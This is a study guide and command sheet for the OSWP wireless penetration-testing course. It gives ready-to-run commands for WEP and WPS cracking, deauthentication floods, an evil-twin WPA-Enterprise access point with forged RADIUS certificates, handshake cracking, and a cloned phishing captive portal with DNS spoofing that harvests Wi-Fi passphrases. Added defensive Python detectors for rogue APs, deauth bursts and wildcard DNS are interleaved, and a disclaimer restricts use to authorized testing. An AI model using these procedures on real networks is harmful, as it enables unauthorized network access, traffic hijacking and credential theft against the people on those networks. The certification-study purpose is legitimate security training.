# Study guide and command sheet for Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP)

## Installation

In order to run the following commands, install these frameworks first (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng and besside-ng all ship in the `aircrack-ng` package; `macchanger` and `hostapd-mana` are used in later sections):

```sh
sudo apt install aircrack-ng macchanger reaver hashcat hostapd hostapd-mana dnsmasq nftables apache2 libapache2-mod-php freeradius
```

## WEP: fake authentication and MAC filtering

If fake authentication persistently fails, the Access Point (AP) is probably enforcing MAC address filtering: it will only permit connections from a predefined list of MAC addresses. In that case, acquire a legitimate client MAC address by monitoring network traffic with airodump-ng, then impersonate that MAC address once the corresponding client has disconnected from the network. Do not initiate a fake authentication attack with a client's MAC address while that client remains active on the AP.
```sh
airodump-ng -w <CAPTURE_NAME> -c <CHANNEL> --bssid <BSSID> <INTERFACE>   # capture and note associated client MACs
macchanger --show <INTERFACE>                                            # confirm the MAC the interface is using
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>          # fake authentication
aireplay-ng -3 -b <BSSID> -h <YOUR_MAC> <INTERFACE>                        # ARP request replay
aireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>                    # one deauthentication frame to the client
aircrack-ng <CAPTURE_NAME>
```

## WEP cracking with besside-ng

WEP is a severely flawed security algorithm for IEEE 802.11 wireless networks. Below are the steps to exploit its weaknesses:
```sh
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon --encrypt WEP
besside-ng -c <CHANNEL> -b <BSSID> wlan0mon
aircrack-ng ./wep.cap
```

## WPS

WPS was originally known as Wi-Fi Simple Configuration, aiming to unify vendor technologies for secure WPA/WPA2 passphrase sharing. However, it has its own set of vulnerabilities. Below are the steps to identify and exploit them:
```sh
wash -i <INTERFACE> -s                                                       # scan for WPS-enabled APs
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>
reaver -i wlan0 -b <BSSID> -SNLAvv -c 1 -K                                   # -K: Pixie Dust
reaver -i <INTERFACE> -b <BSSID> -SNLAsvv -d 1 -r 5:3 -c <CHANNEL_NUMBER>    # -d/-r: delay and rate limit
```

## WPA/WPA2/WPA3

Steps for testing security on networks with WPA/WPA2/WPA3 encryption, including setting up rogue APs and capturing handshakes.
Follow these steps to set up wireless monitoring and perform the attack.

```sh
airmon-ng check kill && airmon-ng start <interface>
airodump-ng <interface>
```

Note: for a WPA Enterprise network the AUTH column will say MGT.

```sh
sudo airodump-ng -c <channel> -w <ESSID> <interface>
aireplay-ng -0 0 -a <BSSID> -c <CLIENT_MAC> <interface>    # -a takes the AP's BSSID, -c the client's MAC
```

After gathering the BSSID, ESSID, and channel:
- Use Wireshark or tshark with filters:

```
wlan.bssid==E8:9C:12:02:66:AA && eap && tls.handshake.certificate
```

or

```
tls.handshake.type == 11,3
```
View the Packet Details in TLSv1 Record Layer >> Handshake Protocol >> Certificate, export the certificate bytes to cert.der, and read it:

```sh
openssl x509 -inform der -in cert.der -text
```

Details needed for the attack include the Issuer information. Convert the certificate to PEM:

```sh
openssl x509 -inform der -in cert.der -outform pem -out output.crt
```

### FreeRADIUS certificates

Install with:

```sh
sudo apt install freeradius
```

Edit the ca.cnf and server.cnf files so the certificate authority fields look less suspicious:

```sh
sudo mousepad /etc/freeradius/3.0/certs/ca.cnf
sudo mousepad /etc/freeradius/3.0/certs/server.cnf
```

Update the respective sections with the correct information. Then navigate to /etc/freeradius/3.0/certs/ and run:

```sh
sudo rm dh && make
```

Note: Ignore the error from FreeRADIUS if it expects other configurations.
### hostapd-mana

Edit /etc/hostapd-mana/mana.conf with the correct SSID, certificate paths, and EAP user file.
Configure /etc/hostapd-mana/mana.eap_user with the desired protocols and authentication methods.

```sh
hostapd-mana /etc/hostapd-mana/mana.conf
```

Run asleap with the correct command to find a user with a successful login:

```sh
<asleap command> -W /usr/share/john/password.lst
```

Add the network configuration details:
```
network={
  ssid="NetworkName"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity="Domain\\username"
  password="password"
  eap=PEAP
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}
```

Use wpa_supplicant to connect (the interface must be given with -i):

```sh
wpa_supplicant -i <interface> -c <config file>
```

### Creating a rogue AP

Instructions for creating a rogue AP.
```sh
sudo airodump-ng -w capturename --output-format pcap wlan0mon
```

Wireshark filters:

```
wlan.fc.type_subtype == 0x08    # beacon frames (broadcast)
wlan.ssid == "apname"           # AP name
```

Filters can be combined to select beacon frames from a specific AP:

```
wlan.fc.type_subtype == 0x08 && wlan.ssid == "apname"
```

The interesting parts are in Tag: Vendor Specific and Tag: RSN Information.
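From the defender's side, the same beacon fields (the SSID and RSN tags) are what a wireless IDS compares against an inventory of known APs to spot a rogue AP such as the hostapd-mana one built here. The Python below is an added example, not code from the guide: the frames, MAC addresses and the "corpnet" inventory are constructed, and raw 802.11 frames without a radiotap header are assumed.

```python
import struct

# Beacon layout assumed: 24-byte 802.11 header (no radiotap), 12 fixed bytes, then tagged IEs.
HDR = "<HH6s6s6sH"   # frame control, duration, addr1 (DA), addr2 (SA), addr3 (BSSID), seq control

def build_beacon(bssid: str, ssid: str, rsn: bool = True) -> bytes:
    """Constructed beacon: FC 0x0080 (type 0, subtype 8), broadcast DA, SSID IE (0), RSN IE (48)."""
    mac = bytes.fromhex(bssid.replace(":", ""))
    hdr = struct.pack(HDR, 0x0080, 0, b"\xff" * 6, mac, mac, 0)
    cap = 0x0011 if rsn else 0x0001             # ESS bit, plus Privacy bit when RSN is present
    body = struct.pack("<QHH", 0, 100, cap) + bytes([0, len(ssid)]) + ssid.encode()
    if rsn:   # RSN IE: version 1, group CCMP, one pairwise CCMP, one AKM PSK, capabilities 0
        ie = bytes.fromhex("0100000fac040100000fac040100000fac020000")
        body += bytes([48, len(ie)]) + ie
    return hdr + body

def parse_beacon(frame: bytes) -> dict:
    fc, _dur, _da, _sa, bssid, _seq = struct.unpack_from(HDR, frame)
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 8:
        raise ValueError("not a beacon frame")
    cap = struct.unpack_from("<H", frame, 34)[0]
    pos, ies = 36, {}
    while pos + 2 <= len(frame):                # walk the tag/length/value list
        tag, ln = frame[pos], frame[pos + 1]
        ies[tag] = frame[pos + 2:pos + 2 + ln]
        pos += 2 + ln
    return {"bssid": bssid.hex(":"), "ssid": ies.get(0, b"").decode("utf-8", "replace"),
            "privacy": bool(cap & 0x0010), "rsn": 48 in ies}

def find_rogue_aps(frames, known) -> list:
    """known maps ESSID -> set of legitimate BSSIDs taken from a baseline airodump-ng survey.
    Flags a known ESSID beaconed by an unlisted BSSID, or by a listed one without RSN."""
    findings = []
    for frame in frames:
        b = parse_beacon(frame)
        if b["ssid"] not in known:
            continue
        if b["bssid"] not in known[b["ssid"]]:
            findings.append((b["bssid"], b["ssid"], "unknown BSSID for this ESSID"))
        elif not (b["privacy"] and b["rsn"]):
            findings.append((b["bssid"], b["ssid"], "known BSSID beaconing without RSN"))
    return findings

KNOWN = {"corpnet": {"aa:bb:cc:00:00:01"}}                          # constructed inventory
SAMPLE = [build_beacon("aa:bb:cc:00:00:01", "corpnet"),             # legitimate AP
          build_beacon("00:11:22:33:44:55", "corpnet"),             # evil twin, same ESSID
          build_beacon("aa:bb:cc:00:00:01", "corpnet", rsn=False),  # spoofed BSSID, open
          build_beacon("00:11:22:33:44:55", "guest", rsn=False)]    # not in inventory, ignored
ALERTS = find_rogue_aps(SAMPLE, KNOWN)
```

On a live capture, feed the detector frames selected with the `wlan.fc.type_subtype == 0x08` filter above after stripping the radiotap header.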
Hostapd-mana template location:

```
/etc/hostapd-mana/hostapd-mana.conf
```

Or you may download the hostapd-mana.config in this repository and modify it to your needs.

Start hostapd-mana:

```sh
sudo hostapd-mana hostapd-mana.conf
```

### Cracking the captured handshake

aircrack:

```sh
aircrack-ng name.hccapx -w /wordlist/rockyou.txt
```

If you run into errors, you may try:

```sh
aircrack-ng name.hccapx -e ESSID -w /wordlist/rockyou.txt
```

hashcat:

```sh
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt
```
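The wpa_supplicant network block shown earlier in this section has no ca_cert, which is exactly why a client configured that way completes the PEAP tunnel with the rogue RADIUS server and hands over its MSCHAPv2 exchange. As an added example (not code from the guide), the Python below audits such blocks and shows the hardened form; the CA path and RADIUS hostname in HARDENED are assumed values.

```python
import re
# Constructed client config blocks: WEAK mirrors the PEAP block earlier in this section; HARDENED rejects a rogue RADIUS server.
WEAK = r'''
network={
  ssid="NetworkName"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity="Domain\\username"
  password="password"
  eap=PEAP
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}
'''
HARDENED = r'''
network={
  ssid="NetworkName"
  key_mgmt=WPA-EAP
  eap=PEAP
  anonymous_identity="anonymous"
  identity="Domain\\username"
  password="password"
  ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
  domain_match="radius.corp.example"
  phase2="auth=MSCHAPV2"
}
'''
def parse_networks(conf: str) -> list:
    """Return one {key: value} dict per network={...} block, quotes stripped."""
    nets = []
    for body in re.findall(r"network=\{(.*?)\}", conf, re.S):
        pairs = (line.strip().split("=", 1) for line in body.splitlines() if "=" in line)
        nets.append({k.strip(): v.strip().strip('"') for k, v in pairs})
    return nets

def audit_eap(net: dict) -> list:
    """Findings for an EAP block; empty means a rogue RADIUS server with its own certificate is rejected."""
    if "WPA-EAP" not in net.get("key_mgmt", ""):
        return []
    findings = []
    if "ca_cert" not in net and "ca_path" not in net:
        findings.append("no ca_cert: any server certificate is accepted")
    if not any(k in net for k in ("domain_match", "domain_suffix_match", "subject_match")):
        findings.append("no domain_match: a certificate for any hostname is accepted")
    if "anonymous_identity" not in net:
        findings.append("no anonymous_identity: real username sent in the cleartext outer identity")
    return findings

WEAK_FINDINGS = audit_eap(parse_networks(WEAK)[0])          # three findings
HARDENED_FINDINGS = audit_eap(parse_networks(HARDENED)[0])  # none
```

The third check matters for the tshark step above: without anonymous_identity the real username travels in the unencrypted EAP Identity response.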
## Captive portal

This guide provides step-by-step instructions for setting up a wireless network monitoring and attack environment.

Begin by capturing information about clients and access points (APs) around you:

```sh
sudo airodump-ng wlan0mon
```

To specify the capture details, use:

```sh
sudo airodump-ng -w fileName --output-format pcap -c <channelnumber> <interface>
```

Wait until the WPA handshake is captured (a deauthentication makes the client re-associate):

```sh
sudo aireplay-ng -0 <amountOfdeauths> -a <ApBSSID> <interface>
```

After completing the capture, disable monitor mode:
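The deauthentication step used in this guide (here and in the WEP and WPA Enterprise sections) is the part of the procedure a wireless IDS sees most easily: a burst of deauthentication frames from one BSSID within a second. The Python below is an added example, not code from the guide; it counts deauth frames per BSSID in a sliding window over constructed frames (MAC addresses constructed, no radiotap header assumed).

```python
import struct
from collections import defaultdict

HDR = "<HH6s6s6sH"   # 802.11 header: frame control, duration, addr1, addr2, addr3, seq control
DEAUTH_FC = 0x00C0   # type 0 (management), subtype 12 (deauthentication)

def build_deauth(bssid: str, client: str, reason: int = 7) -> bytes:
    """Constructed deauth frame addressed from the AP to one client."""
    b = bytes.fromhex(bssid.replace(":", ""))
    c = bytes.fromhex(client.replace(":", ""))
    return struct.pack(HDR, DEAUTH_FC, 0, c, b, b, 0) + struct.pack("<H", reason)

def is_deauth(frame: bytes) -> bool:
    fc = struct.unpack_from("<H", frame)[0]
    return (fc >> 2) & 0x3 == 0 and (fc >> 4) & 0xF == 12

def deauth_bursts(frames, window_s: float = 1.0, threshold: int = 10) -> dict:
    """frames: iterable of (timestamp_seconds, raw_802_11_frame). Returns {bssid: peak number
    of deauth frames seen in any window_s-wide window} for BSSIDs at or above threshold;
    a handful of genuine deauths per minute never reach it, a flood does within a second."""
    per_bssid = defaultdict(list)
    for ts, frame in frames:
        if is_deauth(frame):
            per_bssid[frame[16:22].hex(":")].append(ts)     # addr3 = BSSID
    alerts = {}
    for bssid, times in per_bssid.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):                        # sliding window over timestamps
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

# Constructed capture: 40 spoofed deauths in under a second against one client, plus two
# legitimate deauths from another AP a minute apart, and one non-deauth (beacon) frame to skip.
SAMPLE = [(i * 0.02, build_deauth("aa:bb:cc:00:00:01", "de:ad:be:ef:00:01")) for i in range(40)]
SAMPLE += [(5.0, build_deauth("aa:bb:cc:00:00:02", "de:ad:be:ef:00:02", reason=3)),
           (65.0, build_deauth("aa:bb:cc:00:00:02", "de:ad:be:ef:00:02", reason=3)),
           (7.0, struct.pack(HDR, 0x0080, 0, b"\xff" * 6, b"\x00" * 6, b"\x00" * 6, 0))]
ALERTS = deauth_bursts(SAMPLE)
```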
### Phishing portal

```sh
sudo apt install apache2 libapache2-mod-php
```

Use wget to download the webpage. Here, -l2 means to go 2 levels deep:

```sh
wget -r -l2 https://www.website.com
```

Create a directory for the phishing webpage:

```sh
sudo mkdir /var/www/html/portal && sudo mousepad /var/www/html/portal/index.php
```

Replicate the styling of the example website page and copy the assets:

```sh
sudo cp -r ./www.website.com/assets /var/www/html/portal
```

Configure the login page to redirect to login_check.php:

```sh
sudo mousepad /var/www/html/portal/login_check.php
```

### Network, DHCP and DNS

```sh
sudo ip addr add 192.168.87.1/24 dev wlan0
sudo ip link set wlan0 up
sudo apt install dnsmasq
```

Create the DHCP config file at /home/kali/dnsmasq.conf and add spoofing entries for top-level domains:
```
address=/com/192.168.0.1
address=/org/192.168.0.1
address=/net/192.168.0.1
address=/dns.msftncsi.com/131.107.255.255
```

```sh
sudo dnsmasq --conf-file=/home/kali/dnsmasq.conf
sudo tail /var/log/syslog | grep dnsmasq
```

Redirect all DNS traffic arriving on wlan0 to the local dnsmasq:

```sh
sudo apt install nftables
sudo nft add table ip nat
sudo nft 'add chain ip nat PREROUTING { type nat hook prerouting priority dstnat; policy accept; }'
sudo nft add rule ip nat PREROUTING iifname "wlan0" udp dport 53 counter redirect to :53
```

### Apache and hostapd

```sh
sudo mousepad /etc/apache2/sites-enabled/000-default.conf
sudo a2enmod rewrite && sudo a2enmod alias
sudo systemctl restart apache2
```

Check the portal locally in Firefox at 127.0.0.1/portal/index.php.

```sh
sudo apt install hostapd && mousepad hostapd.conf
sudo hostapd -B hostapd.conf
```

Monitor the services in two terminals:

- Terminal 1:

```sh
sudo tail -f /var/log/syslog | grep -E '(dnsmasq|hostapd)'
```

- Terminal 2:
```sh
sudo tail -f /var/log/apache2/access.log
```

Locate and read the captured passphrase file:

```sh
sudo find /tmp/ -iname passphrase.txt
sudo cat /tmp/systemd-private-b37…aef-apache2.service-b...i/tmp/passphrase.txt
```

## Target AP details

- ESSID of JesusIsTheWay
- BSSID of 34:5a:90:e0:5a:30
- WPS (AES/CCM)
- Uses a PSK
- Runs on channel 1

## Glossary

- AP: Access Point
- BSSID: Basic Service Set Identifier is a 48-bit number that follows MAC address conventions.
- ESSID: Extended Service Set Identifier is a unique identifier to avoid interference on a wireless network.
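The dnsmasq entries in the captive-portal section answer every .com/.org/.net name with the portal address but pass the Windows NCSI probe name through to its real address, so a connectivity check alone will not notice the spoofing. As an added example (not code from the guide), the Python below detects that wildcard answering from the client side; the canary names and both resolvers are constructed, and wildcard_dns_check defaults to socket.gethostbyname for real use.

```python
import ipaddress
import socket

# Constructed resolver that behaves like the dnsmasq entries in the captive-portal section:
# every .com/.org/.net name gets the portal address, while the Windows NCSI probe name is
# answered with its real address so the client does not report "no internet".
def spoofing_resolver(name: str) -> str:
    if name == "dns.msftncsi.com":
        return "131.107.255.255"
    if name.rsplit(".", 1)[-1] in ("com", "org", "net"):
        return "192.168.0.1"
    raise LookupError(name)

def honest_resolver(name: str) -> str:
    """Constructed stand-in for a normal resolver: the nonexistent canary fails, others differ."""
    if name.startswith("nxdomain-canary"):
        raise LookupError(name)
    return "198.51.100.10" if name.endswith(".com") else "203.0.113.5"   # constructed addresses

# Unrelated canary names; the middle one must not exist on a truthful resolver.
CANARIES = ("www.example.com", "nxdomain-canary-0f1e2d.example.net", "www.example.org")

def wildcard_dns_check(resolve=socket.gethostbyname, canaries=CANARIES) -> dict:
    """Resolve the canaries through `resolve`. If every one of them, including a name that
    cannot exist, maps to the same private address, the resolver is answering wildcard
    queries: a captive portal or a DNS-spoofing rogue AP. Connectivity probes alone miss
    this because the spoofing config passes the probe name through."""
    answers = {}
    for name in canaries:
        try:
            answers[name] = resolve(name)
        except (LookupError, OSError):      # socket.gaierror is an OSError
            answers[name] = None
    ips = {ip for ip in answers.values() if ip}
    spoofed = (len(ips) == 1 and all(answers.values())
               and ipaddress.ip_address(next(iter(ips))).is_private)
    return {"spoofed": spoofed, "answers": answers}
```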
## Tips

- Make sure that hostapd-mana is installed on Kali. Default installations currently feature hostapd, hostapd-wpa and hostapd_cli. None of these frameworks feature the mana_wpaout section in the hostapd-mana.config, and will result in the error: unknown configuration item 'mana_wpaout'
- When starting the exam, the first thing after connecting to the .ovpn is to test both SSH and RDP protocols to ensure the connection works as intended.
- To list wireless interfaces, execute:

```sh
sudo airmon-ng
```

- To restart Network Manager, execute:

```sh
systemctl restart NetworkManager.service
```

## Disclaimer

The techniques, commands, and procedures outlined in this guide are intended solely for educational purposes and preparing for the Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP). These techniques involve methodologies that, if misused, may constitute illegal activities. Users are strongly cautioned against engaging in any unauthorized and/or unlawful actions.
- Authorized Environments Only: The execution of penetration testing, network attacks, and other tactics described herein should only be performed on networks and systems that are explicitly owned or authorized for testing by the user. This includes personal hardware, controlled environments, or environments for which explicit, documented permission has been granted.
- No Unauthorized Use: Under no circumstances should these techniques be applied to networks, systems, or devices without explicit authorization. Unauthorized use of these techniques may lead to legal consequences and is strongly condemned.
- Adherence to Exam Guidelines: While this guide serves as preparation material for the OSWP exam, users must strictly adhere to the guidelines, rules, and ethical standards set forth by Offensive Security during the examination.
- Prohibited Actions: Any attempt to use these techniques outside of the specified exam environment, or in a manner not aligned with the exam's rules, may result in disqualification, legal action, and other serious consequences.
- No Responsibility for Misuse: The authors, contributors, and associated entities of this guide accept no responsibility or liability for any misuse, damage, or illegal activities arising from the information presented. Users are solely responsible for their actions.
- Acknowledgment of Risk: Users acknowledge the risks involved in security testing and penetration testing and agree to ensure ethical and legal use of this information.
- Commitment to Ethical Hacking: Users are encouraged to pursue knowledge in cybersecurity and ethical hacking with a strong commitment to legal compliance, ethical behavior, and respect for privacy and data protection.
By using the information in this guide, you acknowledge having read, understood, and agreed to this disclaimer and all its terms. Your use of this information indicates your acceptance of the risks and your commitment to using this knowledge responsibly and ethically.